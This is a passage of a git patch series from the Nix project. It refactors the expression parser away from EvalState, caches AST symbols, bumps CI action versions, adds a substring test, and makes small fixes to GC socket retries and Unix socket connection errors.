+ +SourcePath EvalState::findFile(const SearchPath & searchPath, const std::string_view path, const PosIdx pos) +{ + for (auto & i : searchPath.elements) { + auto suffixOpt = i.prefix.suffixIfPotentialMatch(path); + + if (!suffixOpt) continue; + auto suffix = *suffixOpt; + + auto rOpt = resolveSearchPathPath(i.path); + if (!rOpt) continue; + auto r = *rOpt; + + Path res = suffix == "" ? r : concatStrings(r, "/", suffix); + if (pathExists(res)) return rootPath(CanonPath(canonPath(res))); + } + + if (hasPrefix(path, "nix/")) + return {corepkgsFS, CanonPath(path.substr(3))}; + + debugThrow(ThrownError({ + .msg = hintfmt(evalSettings.pureEval + ? "cannot look up '<%s>' in pure evaluation mode (use '--impure' to override)" + : "file '%s' was not found in the Nix search path (add it using $NIX_PATH or -I)", + path), + .errPos = positions[pos] + }), 0, 0); +} + + +std::optional EvalState::resolveSearchPathPath(const SearchPath::Path & value0, bool initAccessControl) +{ + auto & value = value0.s; + auto i = searchPathResolved.find(value); + if (i != searchPathResolved.end()) return i->second; + + std::optional res; + + if (EvalSettings::isPseudoUrl(value)) { + try { + auto storePath = fetchers::downloadTarball( + store, EvalSettings::resolvePseudoUrl(value), "source", false).storePath; + res = { store->toRealPath(storePath) }; + } catch (FileTransferError & e) { + logWarning({ + .msg = hintfmt("Nix search path entry '%1%' cannot be downloaded, ignoring", value) + }); + } + } + + else if (hasPrefix(value, "flake:")) { + experimentalFeatureSettings.require(Xp::Flakes); + auto flakeRef = parseFlakeRef(value.substr(6), {}, true, false); + debug("fetching flake search path element '%s''", value); + auto storePath = flakeRef.resolve(store).fetchTree(store).first; + res = { store->toRealPath(storePath) }; + } + + else { + auto path = absPath(value); + + /* Allow access to paths in the search path. 
*/ + if (initAccessControl) { + allowPath(path); + if (store->isInStore(path)) { + try { + StorePathSet closure; + store->computeFSClosure(store->toStorePath(path).first, closure); + for (auto & p : closure) + allowPath(p); + } catch (InvalidPath &) { } + } + } + + if (pathExists(path)) + res = { path }; + else { + logWarning({ + .msg = hintfmt("Nix search path entry '%1%' does not exist, ignoring", value) + }); + res = std::nullopt; + } + } + + if (res) + debug("resolved search path element '%s' to '%s'", value, *res); + else + debug("failed to resolve search path element '%s'", value); + + searchPathResolved.emplace(value, res); + return res; +} + + std::string ExternalValueBase::coerceToString(const Pos & pos, NixStringContext & context, bool copyMore, bool copyToStore) const { throw TypeError({ diff --git a/src/libexpr/nixexpr.cc b/src/libexpr/nixexpr.cc index 964de6351..6fe4ba81b 100644 --- a/src/libexpr/nixexpr.cc +++ b/src/libexpr/nixexpr.cc @@ -9,6 +9,8 @@ namespace nix { +unsigned long Expr::nrExprs = 0; + ExprBlackHole eBlackHole; // FIXME: remove, because *symbols* are abstract and do not have a single diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y index 7763a72bc..519d6b11f 100644 --- a/src/libexpr/parser.y +++ b/src/libexpr/parser.y @@ -389,25 +389,11 @@ formal %% - -#include -#include -#include -#include - #include "eval.hh" -#include "filetransfer.hh" -#include "tarball.hh" -#include "store-api.hh" -#include "flake/flake.hh" -#include "fs-input-accessor.hh" -#include "memory-input-accessor.hh" namespace nix { -unsigned long Expr::nrExprs = 0; - Expr * EvalState::parse( char * text, size_t length, @@ -435,166 +421,4 @@ Expr * EvalState::parse( } -SourcePath resolveExprPath(SourcePath path) -{ - unsigned int followCount = 0, maxFollow = 1024; - - /* If `path' is a symlink, follow it. This is so that relative - path references work. */ - while (!path.path.isRoot()) { - // Basic cycle/depth limit to avoid infinite loops. 
- if (++followCount >= maxFollow) - throw Error("too many symbolic links encountered while traversing the path '%s'", path); - auto p = path.parent().resolveSymlinks() + path.baseName(); - if (p.lstat().type != InputAccessor::tSymlink) break; - path = {path.accessor, CanonPath(p.readLink(), path.path.parent().value_or(CanonPath::root))}; - } - - /* If `path' refers to a directory, append `/default.nix'. */ - if (path.resolveSymlinks().lstat().type == InputAccessor::tDirectory) - return path + "default.nix"; - - return path; -} - - -Expr * EvalState::parseExprFromFile(const SourcePath & path) -{ - return parseExprFromFile(path, staticBaseEnv); -} - - -Expr * EvalState::parseExprFromFile(const SourcePath & path, std::shared_ptr & staticEnv) -{ - auto buffer = path.resolveSymlinks().readFile(); - // readFile hopefully have left some extra space for terminators - buffer.append("\0\0", 2); - return parse(buffer.data(), buffer.size(), Pos::Origin(path), path.parent(), staticEnv); -} - - -Expr * EvalState::parseExprFromString(std::string s_, const SourcePath & basePath, std::shared_ptr & staticEnv) -{ - auto s = make_ref(std::move(s_)); - s->append("\0\0", 2); - return parse(s->data(), s->size(), Pos::String{.source = s}, basePath, staticEnv); -} - - -Expr * EvalState::parseExprFromString(std::string s, const SourcePath & basePath) -{ - return parseExprFromString(std::move(s), basePath, staticBaseEnv); -} - - -Expr * EvalState::parseStdin() -{ - //Activity act(*logger, lvlTalkative, "parsing standard input"); - auto buffer = drainFD(0); - // drainFD should have left some extra space for terminators - buffer.append("\0\0", 2); - auto s = make_ref(std::move(buffer)); - return parse(s->data(), s->size(), Pos::Stdin{.source = s}, rootPath(CanonPath::fromCwd()), staticBaseEnv); -} - - -SourcePath EvalState::findFile(const std::string_view path) -{ - return findFile(searchPath, path); -} - - -SourcePath EvalState::findFile(const SearchPath & searchPath, const std::string_view 
path, const PosIdx pos) -{ - for (auto & i : searchPath.elements) { - auto suffixOpt = i.prefix.suffixIfPotentialMatch(path); - - if (!suffixOpt) continue; - auto suffix = *suffixOpt; - - auto rOpt = resolveSearchPathPath(i.path); - if (!rOpt) continue; - auto r = *rOpt; - - Path res = suffix == "" ? r : concatStrings(r, "/", suffix); - if (pathExists(res)) return rootPath(CanonPath(canonPath(res))); - } - - if (hasPrefix(path, "nix/")) - return {corepkgsFS, CanonPath(path.substr(3))}; - - debugThrow(ThrownError({ - .msg = hintfmt(evalSettings.pureEval - ? "cannot look up '<%s>' in pure evaluation mode (use '--impure' to override)" - : "file '%s' was not found in the Nix search path (add it using $NIX_PATH or -I)", - path), - .errPos = positions[pos] - }), 0, 0); -} - - -std::optional EvalState::resolveSearchPathPath(const SearchPath::Path & value0, bool initAccessControl) -{ - auto & value = value0.s; - auto i = searchPathResolved.find(value); - if (i != searchPathResolved.end()) return i->second; - - std::optional res; - - if (EvalSettings::isPseudoUrl(value)) { - try { - auto storePath = fetchers::downloadTarball( - store, EvalSettings::resolvePseudoUrl(value), "source", false).storePath; - res = { store->toRealPath(storePath) }; - } catch (FileTransferError & e) { - logWarning({ - .msg = hintfmt("Nix search path entry '%1%' cannot be downloaded, ignoring", value) - }); - } - } - - else if (hasPrefix(value, "flake:")) { - experimentalFeatureSettings.require(Xp::Flakes); - auto flakeRef = parseFlakeRef(value.substr(6), {}, true, false); - debug("fetching flake search path element '%s''", value); - auto storePath = flakeRef.resolve(store).fetchTree(store).first; - res = { store->toRealPath(storePath) }; - } - - else { - auto path = absPath(value); - - /* Allow access to paths in the search path. 
*/ - if (initAccessControl) { - allowPath(path); - if (store->isInStore(path)) { - try { - StorePathSet closure; - store->computeFSClosure(store->toStorePath(path).first, closure); - for (auto & p : closure) - allowPath(p); - } catch (InvalidPath &) { } - } - } - - if (pathExists(path)) - res = { path }; - else { - logWarning({ - .msg = hintfmt("Nix search path entry '%1%' does not exist, ignoring", value) - }); - res = std::nullopt; - } - } - - if (res) - debug("resolved search path element '%s' to '%s'", value, *res); - else - debug("failed to resolve search path element '%s'", value); - - searchPathResolved.emplace(value, res); - return res; -} - - } From b596cc9e7960b9256bcd557334d81e9d555be5a2 Mon Sep 17 00:00:00 2001 From: pennae Date: Mon, 15 Jan 2024 16:52:18 +0100 Subject: [PATCH 268/654] decouple parser and EvalState there's no reason the parser itself should be doing semantic analysis like bindVars. split this bit apart (retaining the previous name in EvalState) and have the parser really do *only* parsing, decoupled from EvalState. 
--- src/libexpr/eval.cc | 16 ++++++++++++++++ src/libexpr/lexer.l | 6 +++--- src/libexpr/parser-state.hh | 17 +++++++++-------- src/libexpr/parser.y | 36 +++++++++++++++++++++++++----------- 4 files changed, 53 insertions(+), 22 deletions(-) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 6eee7cdce..b05ccfc85 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -22,6 +22,7 @@ #include "fetch-to-store.hh" #include "tarball.hh" #include "flake/flakeref.hh" +#include "parser-tab.hh" #include #include @@ -2800,6 +2801,21 @@ std::optional EvalState::resolveSearchPathPath(const SearchPath::Pa } +Expr * EvalState::parse( + char * text, + size_t length, + Pos::Origin origin, + const SourcePath & basePath, + std::shared_ptr & staticEnv) +{ + auto result = parseExprFromBuf(text, length, origin, basePath, symbols, positions, rootFS); + + result->bindVars(*this, staticEnv); + + return result; +} + + std::string ExternalValueBase::coerceToString(const Pos & pos, NixStringContext & context, bool copyMore, bool copyToStore) const { throw TypeError({ diff --git a/src/libexpr/lexer.l b/src/libexpr/lexer.l index fae0e7a85..d7a0b5048 100644 --- a/src/libexpr/lexer.l +++ b/src/libexpr/lexer.l @@ -148,7 +148,7 @@ or { return OR_KW; } } catch (const boost::bad_lexical_cast &) { throw ParseError({ .msg = hintfmt("invalid integer '%1%'", yytext), - .errPos = state->state.positions[CUR_POS], + .errPos = state->positions[CUR_POS], }); } return INT_LIT; @@ -158,7 +158,7 @@ or { return OR_KW; } if (errno != 0) throw ParseError({ .msg = hintfmt("invalid float '%1%'", yytext), - .errPos = state->state.positions[CUR_POS], + .errPos = state->positions[CUR_POS], }); return FLOAT_LIT; } @@ -287,7 +287,7 @@ or { return OR_KW; } <> { throw ParseError({ .msg = hintfmt("path has a trailing slash"), - .errPos = state->state.positions[CUR_POS], + .errPos = state->positions[CUR_POS], }); } diff --git a/src/libexpr/parser-state.hh b/src/libexpr/parser-state.hh index 
167d3f4ae..6ab9fc962 100644 --- a/src/libexpr/parser-state.hh +++ b/src/libexpr/parser-state.hh @@ -37,11 +37,12 @@ struct ParserLocation { }; struct ParserState { - EvalState & state; SymbolTable & symbols; + PosTable & positions; Expr * result; SourcePath basePath; PosTable::Origin origin; + const ref rootFS; void dupAttr(const AttrPath & attrPath, const PosIdx pos, const PosIdx prevPos); void dupAttr(Symbol attr, const PosIdx pos, const PosIdx prevPos); @@ -56,16 +57,16 @@ inline void ParserState::dupAttr(const AttrPath & attrPath, const PosIdx pos, co { throw ParseError({ .msg = hintfmt("attribute '%1%' already defined at %2%", - showAttrPath(state.symbols, attrPath), state.positions[prevPos]), - .errPos = state.positions[pos] + showAttrPath(symbols, attrPath), positions[prevPos]), + .errPos = positions[pos] }); } inline void ParserState::dupAttr(Symbol attr, const PosIdx pos, const PosIdx prevPos) { throw ParseError({ - .msg = hintfmt("attribute '%1%' already defined at %2%", state.symbols[attr], state.positions[prevPos]), - .errPos = state.positions[pos] + .msg = hintfmt("attribute '%1%' already defined at %2%", symbols[attr], positions[prevPos]), + .errPos = positions[pos] }); } @@ -146,13 +147,13 @@ inline Formals * ParserState::validateFormals(Formals * formals, PosIdx pos, Sym if (duplicate) throw ParseError({ .msg = hintfmt("duplicate formal function argument '%1%'", symbols[duplicate->first]), - .errPos = state.positions[duplicate->second] + .errPos = positions[duplicate->second] }); if (arg && formals->has(arg)) throw ParseError({ .msg = hintfmt("duplicate formal function argument '%1%'", symbols[arg]), - .errPos = state.positions[pos] + .errPos = positions[pos] }); return formals; @@ -256,7 +257,7 @@ inline Expr * ParserState::stripIndentation(const PosIdx pos, inline PosIdx ParserState::at(const ParserLocation & loc) { - return state.positions.add(origin, loc.first_line, loc.first_column); + return positions.add(origin, loc.first_line, 
loc.first_column); } } diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y index 519d6b11f..faf5e897f 100644 --- a/src/libexpr/parser.y +++ b/src/libexpr/parser.y @@ -32,6 +32,19 @@ #define YY_DECL int yylex \ (YYSTYPE * yylval_param, YYLTYPE * yylloc_param, yyscan_t yyscanner, nix::ParserState * state) +namespace nix { + +Expr * parseExprFromBuf( + char * text, + size_t length, + Pos::Origin origin, + const SourcePath & basePath, + SymbolTable & symbols, + PosTable & positions, + const ref rootFS); + +} + #endif } @@ -52,7 +65,7 @@ void yyerror(YYLTYPE * loc, yyscan_t scanner, ParserState * state, const char * { throw ParseError({ .msg = hintfmt(error), - .errPos = state->state.positions[state->at(*loc)] + .errPos = state->positions[state->at(*loc)] }); } @@ -141,7 +154,7 @@ expr_function { if (!$2->dynamicAttrs.empty()) throw ParseError({ .msg = hintfmt("dynamic attributes not allowed in let"), - .errPos = state->state.positions[CUR_POS] + .errPos = state->positions[CUR_POS] }); $$ = new ExprLet($2, $4); } @@ -231,7 +244,7 @@ expr_simple if (noURLLiterals) throw ParseError({ .msg = hintfmt("URL literals are disabled"), - .errPos = state->state.positions[CUR_POS] + .errPos = state->positions[CUR_POS] }); $$ = new ExprString(std::string($1)); } @@ -271,7 +284,7 @@ path_start /* add back in the trailing '/' to the first segment */ if ($1.p[$1.l-1] == '/' && $1.l > 1) path += "/"; - $$ = new ExprPath(ref(state->state.rootFS), std::move(path)); + $$ = new ExprPath(ref(state->rootFS), std::move(path)); } | HPATH { if (evalSettings.pureEval) { @@ -281,7 +294,7 @@ path_start ); } Path path(getHome() + std::string($1.p + 1, $1.l - 1)); - $$ = new ExprPath(ref(state->state.rootFS), std::move(path)); + $$ = new ExprPath(ref(state->rootFS), std::move(path)); } ; @@ -327,7 +340,7 @@ attrs } else throw ParseError({ .msg = hintfmt("dynamic attributes not allowed in inherit"), - .errPos = state->state.positions[state->at(@2)] + .errPos = state->positions[state->at(@2)] }); 
} | { $$ = new AttrPath; } @@ -394,19 +407,22 @@ formal namespace nix { -Expr * EvalState::parse( +Expr * parseExprFromBuf( char * text, size_t length, Pos::Origin origin, const SourcePath & basePath, - std::shared_ptr & staticEnv) + SymbolTable & symbols, + PosTable & positions, + const ref rootFS) { yyscan_t scanner; ParserState state { - .state = *this, .symbols = symbols, + .positions = positions, .basePath = basePath, .origin = {origin}, + .rootFS = rootFS, }; yylex_init(&scanner); @@ -415,8 +431,6 @@ Expr * EvalState::parse( yy_scan_buffer(text, length, scanner); yyparse(scanner, &state); - state.result->bindVars(*this, staticEnv); - return state.result; } From 09a1128d9e2ff0ae6176784938047350d6f8a782 Mon Sep 17 00:00:00 2001 From: pennae Date: Mon, 15 Jan 2024 16:52:18 +0100 Subject: [PATCH 269/654] don't repeatedly look up ast internal symbols these symbols are used a *lot*, so it makes sense to cache them. this mostly increases clarity of the code (however clear one may wish to call the parser desugaring here), but it also provides a small performance benefit. 
--- src/libexpr/eval.cc | 12 +++++++++++- src/libexpr/eval.hh | 2 ++ src/libexpr/nixexpr.hh | 5 +++++ src/libexpr/parser-state.hh | 1 + src/libexpr/parser.y | 31 +++++++++++++++++-------------- 5 files changed, 36 insertions(+), 15 deletions(-) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index b05ccfc85..dc9167144 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -419,6 +419,16 @@ EvalState::EvalState( , sPath(symbols.create("path")) , sPrefix(symbols.create("prefix")) , sOutputSpecified(symbols.create("outputSpecified")) + , exprSymbols{ + .sub = symbols.create("__sub"), + .lessThan = symbols.create("__lessThan"), + .mul = symbols.create("__mul"), + .div = symbols.create("__div"), + .or_ = symbols.create("or"), + .findFile = symbols.create("__findFile"), + .nixPath = symbols.create("__nixPath"), + .body = symbols.create("body") + } , repair(NoRepair) , emptyBindings(0) , rootFS( @@ -2808,7 +2818,7 @@ Expr * EvalState::parse( const SourcePath & basePath, std::shared_ptr & staticEnv) { - auto result = parseExprFromBuf(text, length, origin, basePath, symbols, positions, rootFS); + auto result = parseExprFromBuf(text, length, origin, basePath, symbols, positions, rootFS, exprSymbols); result->bindVars(*this, staticEnv); diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index 9141156b1..2368187b1 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -207,6 +207,8 @@ public: sPrefix, sOutputSpecified; + const Expr::AstSymbols exprSymbols; + /** * If set, force copying files to the Nix store even if they * already exist there. 
diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh index 3cd46ca27..b6189c2a9 100644 --- a/src/libexpr/nixexpr.hh +++ b/src/libexpr/nixexpr.hh @@ -140,6 +140,11 @@ std::string showAttrPath(const SymbolTable & symbols, const AttrPath & attrPath) struct Expr { + struct AstSymbols { + Symbol sub, lessThan, mul, div, or_, findFile, nixPath, body; + }; + + static unsigned long nrExprs; Expr() { nrExprs++; diff --git a/src/libexpr/parser-state.hh b/src/libexpr/parser-state.hh index 6ab9fc962..a5b932ae8 100644 --- a/src/libexpr/parser-state.hh +++ b/src/libexpr/parser-state.hh @@ -43,6 +43,7 @@ struct ParserState { SourcePath basePath; PosTable::Origin origin; const ref rootFS; + const Expr::AstSymbols & s; void dupAttr(const AttrPath & attrPath, const PosIdx pos, const PosIdx prevPos); void dupAttr(Symbol attr, const PosIdx pos, const PosIdx prevPos); diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y index faf5e897f..e95da37f7 100644 --- a/src/libexpr/parser.y +++ b/src/libexpr/parser.y @@ -41,7 +41,8 @@ Expr * parseExprFromBuf( const SourcePath & basePath, SymbolTable & symbols, PosTable & positions, - const ref rootFS); + const ref rootFS, + const Expr::AstSymbols & astSymbols); } @@ -168,13 +169,13 @@ expr_if expr_op : '!' 
expr_op %prec NOT { $$ = new ExprOpNot($2); } - | '-' expr_op %prec NEGATE { $$ = new ExprCall(CUR_POS, new ExprVar(state->symbols.create("__sub")), {new ExprInt(0), $2}); } + | '-' expr_op %prec NEGATE { $$ = new ExprCall(CUR_POS, new ExprVar(state->s.sub), {new ExprInt(0), $2}); } | expr_op EQ expr_op { $$ = new ExprOpEq($1, $3); } | expr_op NEQ expr_op { $$ = new ExprOpNEq($1, $3); } - | expr_op '<' expr_op { $$ = new ExprCall(state->at(@2), new ExprVar(state->symbols.create("__lessThan")), {$1, $3}); } - | expr_op LEQ expr_op { $$ = new ExprOpNot(new ExprCall(state->at(@2), new ExprVar(state->symbols.create("__lessThan")), {$3, $1})); } - | expr_op '>' expr_op { $$ = new ExprCall(state->at(@2), new ExprVar(state->symbols.create("__lessThan")), {$3, $1}); } - | expr_op GEQ expr_op { $$ = new ExprOpNot(new ExprCall(state->at(@2), new ExprVar(state->symbols.create("__lessThan")), {$1, $3})); } + | expr_op '<' expr_op { $$ = new ExprCall(state->at(@2), new ExprVar(state->s.lessThan), {$1, $3}); } + | expr_op LEQ expr_op { $$ = new ExprOpNot(new ExprCall(state->at(@2), new ExprVar(state->s.lessThan), {$3, $1})); } + | expr_op '>' expr_op { $$ = new ExprCall(state->at(@2), new ExprVar(state->s.lessThan), {$3, $1}); } + | expr_op GEQ expr_op { $$ = new ExprOpNot(new ExprCall(state->at(@2), new ExprVar(state->s.lessThan), {$1, $3})); } | expr_op AND expr_op { $$ = new ExprOpAnd(state->at(@2), $1, $3); } | expr_op OR expr_op { $$ = new ExprOpOr(state->at(@2), $1, $3); } | expr_op IMPL expr_op { $$ = new ExprOpImpl(state->at(@2), $1, $3); } @@ -182,9 +183,9 @@ expr_op | expr_op '?' 
attrpath { $$ = new ExprOpHasAttr($1, std::move(*$3)); delete $3; } | expr_op '+' expr_op { $$ = new ExprConcatStrings(state->at(@2), false, new std::vector >({{state->at(@1), $1}, {state->at(@3), $3}})); } - | expr_op '-' expr_op { $$ = new ExprCall(state->at(@2), new ExprVar(state->symbols.create("__sub")), {$1, $3}); } - | expr_op '*' expr_op { $$ = new ExprCall(state->at(@2), new ExprVar(state->symbols.create("__mul")), {$1, $3}); } - | expr_op '/' expr_op { $$ = new ExprCall(state->at(@2), new ExprVar(state->symbols.create("__div")), {$1, $3}); } + | expr_op '-' expr_op { $$ = new ExprCall(state->at(@2), new ExprVar(state->s.sub), {$1, $3}); } + | expr_op '*' expr_op { $$ = new ExprCall(state->at(@2), new ExprVar(state->s.mul), {$1, $3}); } + | expr_op '/' expr_op { $$ = new ExprCall(state->at(@2), new ExprVar(state->s.div), {$1, $3}); } | expr_op CONCAT expr_op { $$ = new ExprOpConcatLists(state->at(@2), $1, $3); } | expr_app ; @@ -208,7 +209,7 @@ expr_select | /* Backwards compatibility: because Nixpkgs has a rarely used function named ‘or’, allow stuff like ‘map or [...]’. */ expr_simple OR_KW - { $$ = new ExprCall(CUR_POS, $1, {new ExprVar(CUR_POS, state->symbols.create("or"))}); } + { $$ = new ExprCall(CUR_POS, $1, {new ExprVar(CUR_POS, state->s.or_)}); } | expr_simple ; @@ -235,8 +236,8 @@ expr_simple | SPATH { std::string path($1.p + 1, $1.l - 2); $$ = new ExprCall(CUR_POS, - new ExprVar(state->symbols.create("__findFile")), - {new ExprVar(state->symbols.create("__nixPath")), + new ExprVar(state->s.findFile), + {new ExprVar(state->s.nixPath), new ExprString(std::move(path))}); } | URI { @@ -252,7 +253,7 @@ expr_simple /* Let expressions `let {..., body = ...}' are just desugared into `(rec {..., body = ...}).body'. 
*/ | LET '{' binds '}' - { $3->recursive = true; $$ = new ExprSelect(noPos, $3, state->symbols.create("body")); } + { $3->recursive = true; $$ = new ExprSelect(noPos, $3, state->s.body); } | REC '{' binds '}' { $3->recursive = true; $$ = $3; } | '{' binds '}' @@ -414,7 +415,8 @@ Expr * parseExprFromBuf( const SourcePath & basePath, SymbolTable & symbols, PosTable & positions, - const ref rootFS) + const ref rootFS, + const Expr::AstSymbols & astSymbols) { yyscan_t scanner; ParserState state { @@ -423,6 +425,7 @@ Expr * parseExprFromBuf( .basePath = basePath, .origin = {origin}, .rootFS = rootFS, + .s = astSymbols, }; yylex_init(&scanner); From e0a76430861efbcfaf14c8b3691a091e6e72a8ed Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 15 Jan 2024 22:35:12 +0000 Subject: [PATCH 270/654] Bump cachix/install-nix-action from 24 to 25 Bumps [cachix/install-nix-action](https://github.com/cachix/install-nix-action) from 24 to 25. - [Release notes](https://github.com/cachix/install-nix-action/releases) - [Commits](https://github.com/cachix/install-nix-action/compare/v24...v25) --- updated-dependencies: - dependency-name: cachix/install-nix-action dependency-type: direct:production update-type: version-update:semver-major ... 
Signed-off-by: dependabot[bot] --- .github/workflows/ci.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index aa2551424..8d88de4b1 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -20,7 +20,7 @@ jobs: - uses: actions/checkout@v4 with: fetch-depth: 0 - - uses: cachix/install-nix-action@v24 + - uses: cachix/install-nix-action@v25 with: # The sandbox would otherwise be disabled by default on Darwin extra_nix_config: "sandbox = true" @@ -62,7 +62,7 @@ jobs: with: fetch-depth: 0 - run: echo CACHIX_NAME="$(echo $GITHUB_REPOSITORY-install-tests | tr "[A-Z]/" "[a-z]-")" >> $GITHUB_ENV - - uses: cachix/install-nix-action@v24 + - uses: cachix/install-nix-action@v25 with: install_url: https://releases.nixos.org/nix/nix-2.13.3/install - uses: cachix/cachix-action@v13 @@ -84,7 +84,7 @@ jobs: steps: - uses: actions/checkout@v4 - run: echo CACHIX_NAME="$(echo $GITHUB_REPOSITORY-install-tests | tr "[A-Z]/" "[a-z]-")" >> $GITHUB_ENV - - uses: cachix/install-nix-action@v24 + - uses: cachix/install-nix-action@v25 with: install_url: '${{needs.installer.outputs.installerURL}}' install_options: "--tarball-url-prefix https://${{ env.CACHIX_NAME }}.cachix.org/serve" @@ -114,7 +114,7 @@ jobs: - uses: actions/checkout@v4 with: fetch-depth: 0 - - uses: cachix/install-nix-action@v24 + - uses: cachix/install-nix-action@v25 with: install_url: https://releases.nixos.org/nix/nix-2.13.3/install - run: echo CACHIX_NAME="$(echo $GITHUB_REPOSITORY-install-tests | tr "[A-Z]/" "[a-z]-")" >> $GITHUB_ENV From bf7754c0991c33146da9c339a71d661615afc93a Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 15 Jan 2024 22:35:15 +0000 Subject: [PATCH 271/654] Bump cachix/cachix-action from 13 to 14 Bumps [cachix/cachix-action](https://github.com/cachix/cachix-action) from 13 to 14. 
- [Release notes](https://github.com/cachix/cachix-action/releases) - [Commits](https://github.com/cachix/cachix-action/compare/v13...v14) --- updated-dependencies: - dependency-name: cachix/cachix-action dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] --- .github/workflows/ci.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index aa2551424..878720acc 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -25,7 +25,7 @@ jobs: # The sandbox would otherwise be disabled by default on Darwin extra_nix_config: "sandbox = true" - run: echo CACHIX_NAME="$(echo $GITHUB_REPOSITORY-install-tests | tr "[A-Z]/" "[a-z]-")" >> $GITHUB_ENV - - uses: cachix/cachix-action@v13 + - uses: cachix/cachix-action@v14 if: needs.check_secrets.outputs.cachix == 'true' with: name: '${{ env.CACHIX_NAME }}' @@ -65,7 +65,7 @@ jobs: - uses: cachix/install-nix-action@v24 with: install_url: https://releases.nixos.org/nix/nix-2.13.3/install - - uses: cachix/cachix-action@v13 + - uses: cachix/cachix-action@v14 with: name: '${{ env.CACHIX_NAME }}' signingKey: '${{ secrets.CACHIX_SIGNING_KEY }}' @@ -119,7 +119,7 @@ jobs: install_url: https://releases.nixos.org/nix/nix-2.13.3/install - run: echo CACHIX_NAME="$(echo $GITHUB_REPOSITORY-install-tests | tr "[A-Z]/" "[a-z]-")" >> $GITHUB_ENV - run: echo NIX_VERSION="$(nix --experimental-features 'nix-command flakes' eval .\#default.version | tr -d \")" >> $GITHUB_ENV - - uses: cachix/cachix-action@v13 + - uses: cachix/cachix-action@v14 if: needs.check_secrets.outputs.cachix == 'true' with: name: '${{ env.CACHIX_NAME }}' From cbc319e9be3b29e3eb29a6e4cf08db1e0363d7bd Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Tue, 16 Jan 2024 12:18:02 +0100 Subject: [PATCH 272/654] tests/functional/lang: Test substring with negative length --- tests/functional/lang/eval-okay-substring.exp | 2 +- 
tests/functional/lang/eval-okay-substring.nix | 2 ++ 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/tests/functional/lang/eval-okay-substring.exp b/tests/functional/lang/eval-okay-substring.exp index 6aace04b0..f48b4623a 100644 --- a/tests/functional/lang/eval-okay-substring.exp +++ b/tests/functional/lang/eval-okay-substring.exp @@ -1 +1 @@ -"ooxfoobarybarzobaabbc" +"ooxfoobarybarzobaabbc_bad" diff --git a/tests/functional/lang/eval-okay-substring.nix b/tests/functional/lang/eval-okay-substring.nix index 424af00d9..54c97e162 100644 --- a/tests/functional/lang/eval-okay-substring.nix +++ b/tests/functional/lang/eval-okay-substring.nix @@ -19,3 +19,5 @@ substring 1 2 s + substring 3 1 s + "c" + substring 5 10 "perl" ++ "_" ++ substring 3 (-1) "tebbad" From baea5f42c602c0233c3ed9c2d668409f86f901b9 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Tue, 16 Jan 2024 14:50:53 +0100 Subject: [PATCH 273/654] doc/glossary: Simplify software package definition Co-authored-by: Valentin Gagarin --- doc/manual/src/glossary.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/manual/src/glossary.md b/doc/manual/src/glossary.md index 5e3c0e024..3c0570a44 100644 --- a/doc/manual/src/glossary.md +++ b/doc/manual/src/glossary.md @@ -273,7 +273,7 @@ - [package]{#package} - 1. A software package; typically a collection of programs, files and data. + 1. A software package; a collection of files and other data. 2. A [package attribute set]. 
From 0b1d93d2bae5fda9924f13246d7a667ce4392a4d Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Tue, 16 Jan 2024 15:23:22 +0100 Subject: [PATCH 274/654] Sleep a bit between attempts to connect to the root server --- src/libstore/gc.cc | 1 + 1 file changed, 1 insertion(+) diff --git a/src/libstore/gc.cc b/src/libstore/gc.cc index f60011f95..cb820e2d5 100644 --- a/src/libstore/gc.cc +++ b/src/libstore/gc.cc @@ -154,6 +154,7 @@ void LocalStore::addTempRoot(const StorePath & path) if (e.errNo == ECONNREFUSED || e.errNo == ENOENT) { debug("GC socket connection refused: %s", e.msg()); fdRootsSocket->close(); + std::this_thread::sleep_for(std::chrono::milliseconds(100)); goto restart; } throw; From d005bade7f3339cc68bee12ce13d863d51d54dc4 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Tue, 16 Jan 2024 15:23:46 +0100 Subject: [PATCH 275/654] connect(): Propagate errno from the child process This is necessary on macOS since addTempRoot() relies on errno. --- src/libutil/unix-domain-socket.cc | 39 +++++++++++++++++++++---------- 1 file changed, 27 insertions(+), 12 deletions(-) diff --git a/src/libutil/unix-domain-socket.cc b/src/libutil/unix-domain-socket.cc index 8949461d2..05bbb5ba3 100644 --- a/src/libutil/unix-domain-socket.cc +++ b/src/libutil/unix-domain-socket.cc @@ -1,6 +1,7 @@ #include "file-system.hh" #include "processes.hh" #include "unix-domain-socket.hh" +#include "util.hh" #include #include @@ -75,21 +76,35 @@ void connect(int fd, const std::string & path) addr.sun_family = AF_UNIX; if (path.size() + 1 >= sizeof(addr.sun_path)) { + Pipe pipe; + pipe.create(); Pid pid = startProcess([&]() { - Path dir = dirOf(path); - if (chdir(dir.c_str()) == -1) - throw SysError("chdir to '%s' failed", dir); - std::string base(baseNameOf(path)); - if (base.size() + 1 >= sizeof(addr.sun_path)) - throw Error("socket path '%s' is too long", base); - memcpy(addr.sun_path, base.c_str(), 